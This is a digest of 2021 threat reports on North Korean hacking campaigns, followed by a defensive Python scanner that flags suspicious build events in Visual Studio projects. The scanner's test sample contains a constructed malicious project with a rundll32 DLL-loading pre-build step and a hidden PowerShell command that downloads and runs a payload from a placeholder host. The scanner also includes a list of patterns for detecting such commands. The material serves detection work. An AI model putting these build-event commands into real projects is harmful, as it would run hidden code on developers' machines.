2021 (211 reports)
U.S. charges against three North Korean men covered a financially motivated Lazarus theft campaign that sought to steal more than $1.3 billion from banks and cryptocurrency exchanges, including the Bangladesh Bank heist. Symantec links the activity to Banswift malware …
ESTsecurity analyzed a Thallium-attributed malicious HWP document disguised as a COVID-19 small-business support guide. The document used embedded OLE objects and fake confirmation imagery to lure the user into launching apisecurity.vbs, which staged apis…
FBI, CISA, and Treasury assessed that North Korean state-sponsored Lazarus Group/HIDDEN COBRA actors used AppleJeus malware to target cryptocurrency exchanges, financial services firms, and related organizations for theft. The advisory says the operators …
The U.S. Justice Department indictment alleged that three North Korean programmers linked to the Reconnaissance General Bureau (RGB), associated in security reporting with Lazarus Group and APT38, conducted a long-running conspiracy spanning destructive attacks, financial theft, extortion, and…
presentation/GReATIDEA2021_Lazarus.pdf at main · theseongsu/presentation · GitHub
Chainalysis attributed the 2020 KuCoin exchange hack, involving roughly $275 million in stolen cryptocurrency, to Lazarus Group based partly on laundering patterns previously associated with the North Korean actor. The report says the attackers gained acc…
ASEC observed malware distributed as a PIF executable disguised as a revised 2021 Ministry of National Defense work-report document. When run, the file displayed a legitimate PDF copied from the ministry website while silently dropping a malicious DLL at …
The report describes malicious Word documents themed around North Korean COVID-19 conditions that used VBA macros to drop a secondary payload and connect infected systems to attacker command-and-control infrastructure. The payload was identified as Amadey…
ThreatBook analyzed a Konni APT campaign using a North Korea COVID-19 supplies article as a lure document, consistent with the group’s long-running spear-phishing against South Korea and regional targets. The malicious Word document hid its text until mac…
Norfolk Infosec analyzed a malicious helpsvc.sys component from a DPRK-affiliated campaign targeting security researchers, likely delivered through a watering-hole route rather than the earlier Visual Studio social-engineering chain. The file behaves like…
NTT Security Japan reported changes in activity by CryptoMimic, a financially motivated targeted attack group also known as Dangerous Password, CageyChameleon, Leery Turtle, or CryptoCore and described as having possible Lazarus links. The group continued ta…
This Korean analysis describes DPRK-linked malware activity targeting security researchers through fake vulnerability research collaboration and an actor-controlled blog at blog.br0vvnn[.]io. The attack chain used malicious exploit PoC projects whose buil…
The archived analysis reverse-engineers Torisma and LCPDot malware used in Lazarus/Hidden Cobra Operation Dream Job activity. Torisma is described as collecting host and process information, creating malicious pipes, loading DLLs, encrypting C2 communicat…
Microsoft attributed a campaign targeting security researchers to ZINC, a DPRK-affiliated state-sponsored group, after detecting attacks against penetration testers, private offensive researchers, and employees at security and technology companies. The op…
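The researcher-targeting entries above (the malicious exploit PoC projects and the ZINC attribution) share one delivery detail: the payload ran when the victim built the shared project, not when they opened a file. A practical triage check is therefore to inspect a received Visual Studio project for build events before building it. The scanner below is an added example, not code from any of the cited reports, and it assumes (as generally reported for that campaign) that the hostile commands sit in MSBuild PreBuildEvent/PostBuildEvent commands or in an Exec task of a custom Target; the two .vcxproj fragments, the suspicious-pattern list and the file name build-helper.dat are constructed for this example.

```python
"""Scan Visual Studio .vcxproj content for build events that run suspicious commands.

Added example for the researcher-targeting campaign entries above; not code from
any cited report. Assumption: the hostile PoC projects carried their payload in
MSBuild build events (PreBuildEvent/PostBuildEvent/Exec). Sample projects below
are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

# MSBuild elements whose <Command> child is executed by the build.
EVENT_TAGS = {"PreBuildEvent", "PreLinkEvent", "PostBuildEvent", "CustomBuildStep"}

# (regex, label) pairs; any case-insensitive match flags the command.
SUSPICIOUS = [
    (r"\brundll32(\.exe)?\b", "rundll32 used to load a DLL from the build"),
    (r"\bregsvr32(\.exe)?\b", "regsvr32 invocation"),
    (r"\bmshta(\.exe)?\b", "mshta invocation"),
    (r"\bpowershell(\.exe)?\b.*?(-enc\w*|\biex\b|downloadstring|downloadfile)",
     "PowerShell download or encoded command"),
    (r"\bcertutil(\.exe)?\b.*-urlcache", "certutil download"),
    (r"https?://", "network URL in build command"),
]

# Constructed sample: an ordinary project that only copies its output after the build.
BENIGN_VCXPROJ = r"""<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <PostBuildEvent>
      <Command>copy "$(TargetPath)" "$(SolutionDir)dist\"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
</Project>"""

# Constructed sample: a "PoC" project whose pre-build step loads a DLL hidden in the
# project directory and whose custom target pulls a second stage over HTTP.
MALICIOUS_VCXPROJ = r"""<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>cmd /c rundll32.exe "$(ProjectDir)build-helper.dat",Start 0</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="Prepare" BeforeTargets="ClCompile">
    <Exec Command="powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1'))" />
  </Target>
</Project>"""


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def build_event_commands(vcxproj_xml: str) -> list[tuple[str, str]]:
    """Return (event_kind, command) for every command the build would execute."""
    root = ET.fromstring(vcxproj_xml)
    commands = []
    for el in root.iter():
        name = _local(el.tag)
        if name in EVENT_TAGS:
            for child in el:
                if _local(child.tag) == "Command" and child.text and child.text.strip():
                    commands.append((name, child.text.strip()))
        elif name == "Exec" and el.get("Command"):
            # <Exec Command="..."/> inside a custom <Target> also runs at build time.
            commands.append(("Exec", el.get("Command").strip()))
    return commands


def scan_vcxproj(vcxproj_xml: str) -> list[dict]:
    """Flag build commands matching any SUSPICIOUS pattern, with the matching labels."""
    findings = []
    for kind, cmd in build_event_commands(vcxproj_xml):
        reasons = [label for pat, label in SUSPICIOUS if re.search(pat, cmd, re.IGNORECASE)]
        if reasons:
            findings.append({"event": kind, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for name, xml in (("benign", BENIGN_VCXPROJ), ("malicious", MALICIOUS_VCXPROJ)):
        print(name, scan_vcxproj(xml))
```

Run the scan on every .vcxproj (and .csproj/.targets, which use the same schema) in an untrusted project before opening it in Visual Studio, since the IDE can trigger a build on load; treat any rundll32, LOLBin or network command in a build event as a reason to inspect the project in an isolated VM rather than on a research workstation.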